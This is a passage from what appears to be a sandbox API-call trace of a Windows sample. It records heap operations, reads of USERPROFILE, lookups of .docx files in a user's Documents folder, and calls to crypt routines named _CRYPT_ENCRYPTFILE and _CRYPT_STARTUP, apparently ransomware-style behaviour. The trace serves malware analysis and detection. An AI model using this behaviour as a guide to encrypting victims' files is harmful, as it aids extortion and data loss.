dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79338 [0263.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0263.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hYiEt-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YiEt-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iEt-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Et-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0263.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0263.610] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0263.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0263.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0263.610] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0263.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0263.611] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0263.611] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0263.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0263.612] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.612] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.613] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/hYiEt-0f.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa804140, ftCreationTime.dwHighDateTime=0x1d5b490, ftLastAccessTime.dwLowDateTime=0x3513a170, ftLastAccessTime.dwHighDateTime=0x1d5b514, ftLastWriteTime.dwLowDateTime=0x3513a170, ftLastWriteTime.dwHighDateTime=0x1d5b514, nFileSizeHigh=0x0, nFileSizeLow=0x12b4b, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="hYiEt-0f.docx", cAlternateFileName="HYIET-~1.DOC")) returned 0xa87490 [0263.613] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0263.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.614] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0263.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.614] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.618] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0263.619] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.620] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.620] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.620] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.621] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.621] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0263.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: 